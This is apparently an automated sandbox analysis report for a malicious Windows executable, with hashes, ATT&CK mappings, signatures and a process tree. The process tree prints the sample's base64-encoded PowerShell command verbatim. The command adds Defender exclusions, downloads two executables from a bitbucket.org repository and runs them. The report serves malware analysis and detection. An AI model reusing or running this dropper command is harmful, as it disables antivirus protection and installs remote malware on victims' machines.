932c5de2f74301fcbb2d3345524a316160fc1b0d364a31b32f149304ae8b7e2e

General

Target

04823a67af730379e914a9a959d2864c.exe
Size

160KB
MD5

04823a67af730379e914a9a959d2864c
SHA1

35ebf62592f61b6d90ccc922e41a5f11ca87dfa8
SHA256

932c5de2f74301fcbb2d3345524a316160fc1b0d364a31b32f149304ae8b7e2e
SHA512

f24ff8a67664067398688d5b01fb423985777776363bdb1d7fbc3d9ac0024ef0481e51bce34da794102a4f9bb3b4271daf08d365619858491f49529b05acb145
SSDEEP

3072:J/A6S4Tiv39aAdhmVahpNNABXK2Q0AQWuLe/9ulOYJSI9kbJr/:J4/4TivNaAbmVahpNNiXK2Q0AQ1Le/93

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1448	powershell.exe
5	1448	powershell.exe
6	1448	powershell.exe
7	1448	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1720	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1612	04823a67af730379e914a9a959d2864c.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 1448	1612	04823a67af730379e914a9a959d2864c.exe	27
PID 1612 wrote to memory of 1448	1612	04823a67af730379e914a9a959d2864c.exe	27
PID 1612 wrote to memory of 1448	1612	04823a67af730379e914a9a959d2864c.exe	27
PID 1448 wrote to memory of 1720	1448	powershell.exe	29
PID 1448 wrote to memory of 1720	1448	powershell.exe	29
PID 1448 wrote to memory of 1720	1448	powershell.exe	29

C:\Users\Admin\AppData\Local\Temp\04823a67af730379e914a9a959d2864c.exe
"C:\Users\Admin\AppData\Local\Temp\04823a67af730379e914a9a959d2864c.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGcAeAB2ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAcgB0ACMAPgA7ACIAOwA8ACMAZgBxAHQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBzAHkAbQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHoAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBnAGgAaAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANgAxAC8AcgBhAHQAdQBvAGEAawBlAGgAaABlAC8AcgBhAHcALwA2ADkAMwAxADYANABkADQAMQBiAGQAYgA0AGIAMwBiADQAZAA4AGUAMgA5AGEAMABjAGEANwAzADAAMAA5ADkAZABkAGEAZAA3ADgANgBiAC8AZABlAGUAbABpAG0ALgBlAHgAZQAnACwAIAA8ACMAbQB2AGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGsAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB6AHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHUAcgByAG8AZwBhAHQAZQAuAGUAeABlACcAKQApADwAIwB6AHcAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AbAB1AGMAaQBmAGUAcgA2ADEALwByAGEAdAB1AG8AYQBrAGUAaABoAGUALwByAGEAdwAvADYAOQAzADEANgA0AGQANAAxAGIAZABiADQAYgAzAGIANABkADgAZQAyADkAYQAwAGMAYQA3ADMAMAAwADkAOQBkAGQAYQBkADcAOAA2AGIALwByAG8AbwBvAGUAdAAuAGUAeABlACcALAAgADwAIwBuAGkAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAdAB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAcgBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAbwBtAEgAbwBzAHQALgBlAHgAZQAnACkAKQA8ACMAYgBqAG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQB3AHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHIAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAdQByAHIAbwBnAGEAdABlAC4AZQB4AGUAJwApADwAIwBzAGwAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGgAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegBkAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBvAG0ASABvAHMAdAAuAGUAeABlACcAKQA8ACMAZgB6AGgAIwA+AA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#gxv#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#drt#>;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1720

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
266fa329e5ab32a2344d86c4d04becae

SHA1
0a37c42aee36af183252a29d3c28712e449df87b

SHA256
94734a1166bc96df6a545ab01165b97fc942feaa9d6b1d47bd12cf5c95ac7d14

SHA512
e0b1ea2f7bf5a8cf2d96ffc87af95b4d29b3085b8a13b202883ba24b89770ee5f5df6843755bcd6fc5145404ca4abb7f88d0cbe077fbc4c7f5066dd655c3b62f

Download Submit
memory/1448-66-0x000000000268B000-0x00000000026AA000-memory.dmp

Filesize
124KB

Download
memory/1448-58-0x000007FEF2E70000-0x000007FEF3893000-memory.dmp

Filesize
10.1MB

Download
memory/1448-59-0x000007FEEE940000-0x000007FEEF49D000-memory.dmp

Filesize
11.4MB

Download
memory/1448-60-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1448-73-0x000000000268B000-0x00000000026AA000-memory.dmp

Filesize
124KB

Download
memory/1448-72-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1612-55-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

Filesize
8KB

Download
memory/1612-54-0x0000000001100000-0x000000000112E000-memory.dmp

Filesize
184KB

Download
memory/1720-64-0x000007FEF2E70000-0x000007FEF3893000-memory.dmp

Filesize
10.1MB

Download
memory/1720-67-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1720-68-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1720-69-0x000007FEED8A0000-0x000007FEEE936000-memory.dmp

Filesize
16.6MB

Download
memory/1720-70-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1720-71-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1720-65-0x000007FEEE940000-0x000007FEEF49D000-memory.dmp

Filesize
11.4MB

Download

Analysis

Sharing